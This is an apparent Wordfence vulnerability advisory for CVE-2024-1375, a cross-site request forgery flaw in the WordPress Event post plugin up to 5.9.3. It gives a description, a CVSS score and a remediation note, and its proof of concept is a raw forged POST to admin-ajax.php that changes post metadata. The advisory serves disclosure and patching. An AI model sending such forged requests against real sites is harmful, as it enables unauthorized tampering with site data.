Cross-Site Request Forgery
Vulnerability Title: Event post <= 5.9.3 - Cross-Site Request Forgery
CVE ID: CVE-2024-1375
CVSS Severity Score: 4.3 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Organization: WordFence
Vulnerability Researcher(s): Francesco Carlucci
Software Link: https://wordpress.org/plugins/event-post
Description
The Event post plugin for WordPress is vulnerable to unauthorized bulk metadata update due to a missing nonce check on the save_bulkdatas function in all versions up to, and including, 5.9.3. This makes it possible for unauthenticated attackers to update post_meta_data via a forged request, granted they can trick a logged-in user into performing an action such as clicking on a link.
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: hack.local
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://hack.local/wp-admin/profile.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 57
Origin: http://hack.local
Connection: close
Cookie: wordpress_5acc5b35664489fa3b3c70e0dde3ac09=subscriber%7C1707233759%7Cn2Sp3F2Ia6H3Eyfpew9jNd0D3IHGQLQHK5aCRS78SBp%7C3d428be5610d4e8c30da7dbfe225ab70729f4b7232f2407771fce67ed114831a; wp-settings-2=editor%3Dtinymce; wp-settings-time-2=1703083980; wp-settings-time-4=1707060959; wp_rtcl_session_5acc5b35664489fa3b3c70e0dde3ac09=4%7C%7C1707085296%7C%7C1707081696%7C%7Caf506c408fb95de747a99fde8fb813d3; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5acc5b35664489fa3b3c70e0dde3ac09=subscriber%7C1707233759%7Cn2Sp3F2Ia6H3Eyfpew9jNd0D3IHGQLQHK5aCRS78SBp%7C65ae6bf76147f30ee28992775f68d419ec14adfb700e99ab83c04d57407cdbc6
action=eventpost_save_bulk&post_ids[]=1066&event_icon=INJ
Any Known Public References
No known public reference
Recommended Solution
Implement a capability check to ensure only allowed individuals can invoke this function. Add a nonce check to ensure that those who invoke this function intended to do so.